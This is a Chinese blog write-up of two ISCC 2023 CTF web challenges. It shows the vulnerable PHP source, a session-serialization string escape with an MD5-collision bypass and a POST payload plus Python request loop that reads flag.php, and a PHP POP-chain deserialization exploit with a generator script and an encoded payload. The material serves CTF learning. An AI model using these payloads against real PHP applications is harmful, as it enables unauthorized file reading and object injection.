ISCC2023 web复现——老狼老狼几点了&where_is_you_love

最新推荐文章于 2024-05-23 23:33:04 发布
最新推荐文章于 2024-05-23 23:33:04 发布
阅读量1.3k 收藏 19
点赞数 25
文章标签: 前端 php web安全 开发语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64016126/article/details/135569951
版权

不好意思久等了,之前说有时间会继续复现,由于最近期末考试,所以也是拖到现在,话不多说,直接进入主题。

老狼老狼几点了 :主要考点 session序列化字符串逃逸和md5强绕过

where_is_you_love:主要考点 POP链,RSA算法 (由于没环境我只复现POP链)

老狼老狼几点了

进入环境,原题是需要对时间进行爆破,在输入是12时回显源码

1705127491 <?php
//"Hello! welcome to ISCC, wish you have a great time!";
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
echo time();

class what_time_is_it{
    protected $func, $target;

    public function __construct($show_time){
        $this->func = $show_time;
    }

    public function __wakeup(){
        echo "wakeup";
    }

    public function call_func(){
        $lets_show_time = unserialize($this->filter($this->func));
        if($lets_show_time['function'] == "show_time"){
            echo 'The time is: ". date("h:i:sa", time()). "<br>';
        }
        else if($lets_show_time['function'] == "hack"){
            file_put_contents('time.php', "<?php echo 'The time is: ". date("h:i:sa", time()). "<br>';");
            echo "做撚啊做,你还是看看时间吧";
            include($lets_show_time['file']);
        }
        else
            highlight_file(__file__);
    }

    private function filter($s){
        return preg_replace('/base64/i','', $s);
    }

    public function __destruct(){
        $this->call_func();
    }

}

if($_SESSION) unset($_SESSION);
$p1 = $_POST['param1'];
$p2 = $_POST['param2'];
$_SESSION['function'] = isset($_GET['func']) ? $_GET['func'] : "highlight_file";
$_SESSION['file'] = 'time.php';
if ($p1 !== $p2 && md5($p1) === md5($p2)){
    if (substr($p1, 0, 10) === strval(time())){
        echo "Just the time";
        extract($_POST);
        $_SESSION['file'] = 'time.php';
        $_SESSION['function'] = "show_time";
    }
    else{
        echo "Sorry wrong time!";
    }
}
$let_me_show_time = serialize($_SESSION)."<br>";
$a = new what_time_is_it($let_me_show_time);

简单分析一下:

1.让我们POST传参param1,param2,它们不相等但是md5值相等并且前是个字符要和time()得出的时间戳相等,才能利用extract($_POST)去覆盖变量,这里是不能利用数组绕过md5的,因为需要进行字符串的比较,只能利用fastcoll工具进行强绕过。

2.对于session如果我们不利用extract($_POST),则只有func一个变量可控,不足以达到逃逸的效果,在没有CET传参func的前提下session值默认是

$_SESSION['function'] = "highlight_file";
$_SESSION['file'] = 'time.php';

3.之后session结果序列化,传入what_time_is_it对象里,对象里的$func变量接受序列化值,$lets_show_time变量接受经过filter函数过滤后在进行反序列化后的值,这个值其实就是一个数组,其中我们需要让function键的值等于hack,进入include文件包含漏洞让 file 键的值是flag.php,由于 flie 键值我们不可控,就需要用到1中分析的变量覆盖来进行字符串逃逸。

注意:我们不能直接覆盖 function 和file 的键值,因为 再覆盖后变量又进行了赋值

if ($p1 !== $p2 && md5($p1) === md5($p2)){
    if (substr($p1, 0, 10) === strval(time())){
        echo "Just the time";
        extract($_POST);
        $_SESSION['file'] = 'time.php';  //变量值又被覆盖了
        $_SESSION['function'] = "show_time";  //
    }
    else{
        echo "Sorry wrong time!";
    }
}

于是我们可以利用extract($_POST)自己构造两个参数,进行字符串逃逸

这里可以将框出来的部分吞掉,然后后面构造我们想要的值

一共要吞18个字符就可以进行逃逸,也就是3个base64,注意伪协议里的bas64也会被过滤,双写记得该长度为57.

可以看到成功逃逸,也就是说我们可以利用extract($_POST)传参:

_SESSION[a] = abase64base64base64&_SESSION[b] = 'b";s:1:"b";s:1:"b";s:8:"function";s:4:"hack";s:4:"file";s:57:"php://filter/read=convert.basbase64e64-encode/resource=flag.php";}         注意GET和POST传参是不需要$的

现在就是怎么绕过md5了,我们可以写一个txt文件,内容是以时间戳开头,往后推迟一点,比如现在时间是1705130645 我们就可以写个 1705130900,放入fastcoll进行爆破即可。

最终payload:(由于是我昨晚做的,时间可能早一点)

POST:

param1=1705073800%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F4%DF%84%02%15%93%C3%E8%CD%243%8Bf%25%ED%AA%ACC%DC%A9Ru%DC%86T%BA9%0E%C5%F9%08%B4%F6%2B%FA%C7X%ED%1BPk%D0%E8%04%88%91%C6F%A0%00%C2%E0%C1Z%25%15%A3%92%1A%815%C6%14s%D7i%DC%F7%AD%E7%00%D3%E7%1B%E8l%0E%81%C0%87%23%90s%3B%40%9A%91%1F%8B%B3+%EF%2B%60h%A6%D7%3B%18T%A7%88%12%14t%04L%5BU%04%0A%DD%069%82AX%25%996%BBV%F6%833%E7a%FF&param2=1705073800%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F4%DF%84%02%15%93%C3%E8%CD%243%8Bf%25%ED%AA%ACC%DC%29Ru%DC%86T%BA9%0E%C5%F9%08%B4%F6%2B%FA%C7X%ED%1BPk%D0%E8%04%88%11%C7F%A0%00%C2%E0%C1Z%25%15%A3%92%1A%015%C6%14s%D7i%DC%F7%AD%E7%00%D3%E7%1B%E8l%0E%81%C0%87%23%90s%BB%40%9A%91%1F%8B%B3+%EF%2B%60h%A6%D7%3B%18T%A7%88%12%14t%04L%5BU%84%09%DD%069%82AX%25%996%BBV%F6%033%E7a%FF&_SESSION[a]=abase64base64base64&_SESSION[b]=b";s:1:"b";s:1:"b";s:8:"function";s:4:"hack";s:4:"file";s:57:"php://filter/read=convert.basbase64e64-encode/resource=flag.php";}

最后我们可以手工一直发包,到了你写的那个时间点就可以得到flag了,这里我还是推荐用脚本去跑,成功概率大一点

import requests

url= "http://localhost/ctf/ISCC2023_time.php"
hd={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
  "Content-Type": "application/x-www-form-urlencoded"}
text1=requests.get(url,headers=hd).text

payload = 'param1=1705073800%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F4%DF%84%02%15%93%C3%E8%CD%243%8Bf%25%ED%AA%ACC%DC%A9Ru%DC%86T%BA9%0E%C5%F9%08%B4%F6%2B%FA%C7X%ED%1BPk%D0%E8%04%88%91%C6F%A0%00%C2%E0%C1Z%25%15%A3%92%1A%815%C6%14s%D7i%DC%F7%AD%E7%00%D3%E7%1B%E8l%0E%81%C0%87%23%90s%3B%40%9A%91%1F%8B%B3+%EF%2B%60h%A6%D7%3B%18T%A7%88%12%14t%04L%5BU%04%0A%DD%069%82AX%25%996%BBV%F6%833%E7a%FF&param2=1705073800%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F4%DF%84%02%15%93%C3%E8%CD%243%8Bf%25%ED%AA%ACC%DC%29Ru%DC%86T%BA9%0E%C5%F9%08%B4%F6%2B%FA%C7X%ED%1BPk%D0%E8%04%88%11%C7F%A0%00%C2%E0%C1Z%25%15%A3%92%1A%015%C6%14s%D7i%DC%F7%AD%E7%00%D3%E7%1B%E8l%0E%81%C0%87%23%90s%BB%40%9A%91%1F%8B%B3+%EF%2B%60h%A6%D7%3B%18T%A7%88%12%14t%04L%5BU%84%09%DD%069%82AX%25%996%BBV%F6%033%E7a%FF&_SESSION[a]=abase64base64base64&_SESSION[b]=b";s:1:"b";s:1:"b";s:8:"function";s:4:"hack";s:4:"file";s:57:"php://filter/read=convert.basbase64e64-encode/resource=flag.php";}'

while 1==1:
  text = requests.post(url,data=payload,headers=hd).text
  if "Just the time" in text:
      print(text)
      break
  else:
      try:
          text1=text.split("<code>")[0]
          print(text1)

      except :
          print(text1)
          print("error except")
          break

拿去base64解密即可得到flag 

where_is_you_love

原题ctrl+u看源码即可得到3个文件好像,POP链是其中一个文件,得出来的flag在原题里是RSA的密钥。

<?php

highlight_file(__FILE__);

class boy
{
    public $like;
    public function __destruct()
    {
        echo "能请你喝杯奶茶吗?";
        @$this->like->make_friends();
    }
    public function __toString()
    {
        echo "拱火大法好";
        return $this->like->string;
    }
}

class girl
{
    private $boyname;
    public function __construct($a)
    {
        $this->boyname = $a;
    }
    public function __call($func, $args)
    {
        echo "我害羞羞";
        isset($this->boyname->name);
    }
}

class helper
{
    private $name; #{"string":"love_story::love"}
    private $string;
    public function __construct($a, $string)
    {
        if ($a === 1) {
            $this->name = array('string' => '(new love_story())->love');
            var_dump($this->name);
            var_dump($this->name['string']);
        } else {
            $this->name = $a;
        }
        $this->string = $string;
    }

    public function __isset($val)
    {
        echo "僚机上线";
        echo $this->name;
    }

    public function __get($name)
    {
        echo "僚机不懈努力";
        $var = $this->$name;
        var_dump($var);
        var_dump($var[$name]);
        $var[$name](); #(new love_story())->love()
    }
}

class love_story
{
    //public $fall_in_love = array("girl_and_boy");
    public function __construct()
    {
        echo "construct nihao";
    }
    public function love()
    {
        echo "爱情萌芽";
        array_walk($this, function ($make, $colo) {
            echo "坠入爱河,给你爱的密码";
            if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
                include('flag.php');
                echo $flag;
                echo "good";
            }
        });
    }
}

$iscc=$_GET['iscc'];
unserialize($iscc);

?>

这里一眼就可以看到目标是love_story里的flag。其中

<?php

class love_story
{
    public $fall_in_love = ['girl_and_boy'];

    public function love()
    {
        array_walk($this, function ($make, $colo) {  
               //$make是类中属性的值,$colo是属性的键名
               echo $make[0].'    ';
               echo $colo;
        });
    }
}


$a=new love_story();
$a->love();

结果:
girl_and_boy    fall_in_love

链子也很清楚:

boy __destruct ->girl __call ->helper  __isset-> boy  __toString-> helper  __get-> love_story  love()
<?php

class boy
{
    public $like;
}

class girl
{
    public $boyname;

}

class helper
{
    private $name;  //注意这里的name和string不能改成public,否则无法调用isset和get
    private $string;
    public function __construct($x, $y)
    {
		$this->name=$x;
		$this->string=$y;
	}
}

class love_story
{
    public $fall_in_love = array("girl_and_boy");
}

$a=new boy();
$a->like=new girl();

$aa=new boy();
$aa->like=new helper(22,['string'=>[new love_story(),'love']]);
	
$a->like->boyname=new helper($aa,22);
echo urlencode(serialize($a));

最终payload:

?iscc=O%3A3%3A%22boy%22%3A1%3A%7Bs%3A4%3A%22like%22%3BO%3A4%3A%22girl%22%3A1%3A%7Bs%3A7%3A%22boyname%22%3BO%3A6%3A%22helper%22%3A2%3A%7Bs%3A12%3A%22%00helper%00name%22%3BO%3A3%3A%22boy%22%3A1%3A%7Bs%3A4%3A%22like%22%3BO%3A6%3A%22helper%22%3A2%3A%7Bs%3A12%3A%22%00helper%00name%22%3Bi%3A22%3Bs%3A14%3A%22%00helper%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A10%3A%22love_story%22%3A1%3A%7Bs%3A12%3A%22fall_in_love%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22girl_and_boy%22%3B%7D%7Di%3A1%3Bs%3A4%3A%22love%22%3B%7D%7D%7D%7Ds%3A14%3A%22%00helper%00string%22%3Bi%3A22%3B%7D%7D%7D

得到flag

来君悦(xiaolaisec)
关注
  • 25
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ISCC2020练武题Web总结
qwzf
06-06 2717
前言 接下来,继续总结练武题的WebWeb MISC
ISCCWeb——WP
weixin_30699831的博客
05-08 581
比赛已经结束了,自己做出来的题也不是很多,跟大家分享一下 第一题:比较数字大小 打开连接 在里面随意输入一个值,他会提示数字太小了 那么我们输入他允许的最大值试试 他还是提示太小了 我们知道做web‘最先看的就是F12打开源码 在源码里我们可以看到框内设置的最长字段是3 那么我们改大,再在框内输入远大于三位数的数字提交就会看到flag了 第二题:we...
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
2401_84185224的博客
04-10 818
获取正在处理的路由的处理函数名称,这里为main.Admin获取Referer头构造以下payload最终HTTP请求体GET /admin?Win64;;v=b3;
ISCC线上赛2024
2301_82000839的博客
05-14 2798
f12查看源码,world.js,查看提示网站首页看到去掉小写o与a首字母组合刚好18位。
2023iscc线上赛web_wp
q1415500189的博客
06-28 959
前端题目,ctrl+s保存前端代码到本地,点击url那里在ctrl+s就行在vue.global.js搜alert,就能找到falg,两次base64编码。
issrc-5.3.3.zip_The Front_delphi inno setup
09-19
ISCmplr project is changed, you normally don t need to recompile Compil32 since it s essentially a text editor, and is not affected by internal changes to the compiler. Non Unicode Inno Setup note: ...
ISCC2013.zip_网络编程_Java_
08-11
ISCC2013北京试题包含服务器攻击 网络攻防破解 溢出等
Python库 | iscc_service-0.2.2-py3-none-any.whl
02-20
python库,解压后可用。 资源全名:iscc_service-0.2.2-py3-none-any.whl
2019ISCC writeup(相对简单)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
PyPI 官网下载 | iscc_service-0.2.2-py3-none-any.whl
01-06
资源来自pypi官网。 资源全名:iscc_service-0.2.2-py3-none-any.whl
ISCC2023 web复现——小周的密码锁
m0_64016126的博客
12-24 1082
ISCC2023 web复现——小周的密码锁
ISCC web复现
m0_62422842的博客
06-05 1315
第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识点。
CTF题解三 逆向 where is your flag(ISCC2017)
LJFYYJ的博客
07-11 2975
直接进入test函数: 下面的代码进行第一步操作: 首先a1的长度应该为19。 接下来对s2进行异或处理。 题目中给出的s2的值如下: s2 = 0x3929531D01070A00LL; v4 = 0x391257391F150703LL; v5 = 0x150F; v6 = 0x1B; s2是int64类型,共有8个字节。由于s2、v4、v5和v6的地址是相连的,所以当...
vue源码之mustache模板引擎1
qweasl_的博客
05-21 462
模板引擎的一个有点:它是将数据转为视图的最优雅的方法。相信vue的玩家首先想到的是。而还没学vue的朋友,就只能进行dom操作了。通过数组的join方法。以及es6推出的模板字符串。
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1328
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【详细介绍WebKit的结构】
最新发布
cz88888888666的博客
05-23 566
WebKit是一个开源的浏览器引擎,主要用于渲染网页内容,它最初由苹果公司为其Safari浏览器开发,目前被多种浏览器和应用程序使用,包括所有基于iOS和macOS的浏览器,WebKit的设计目标是提供快速、精准且流畅的网页浏览体验。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 1149
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
ISCC where
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群中,基站选择最佳的簇头。这里的"最佳"是通过一些规则来近似确定的。在存储的过程中,s2占据了多个字节,而先分配的字节通常被放在低地址处。由于s2、v4、v5和v6的地址是相连的,所以当对s2的起始地址进行19个字节的异或处理时,v4、v5和v6中的数值也会被处理。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值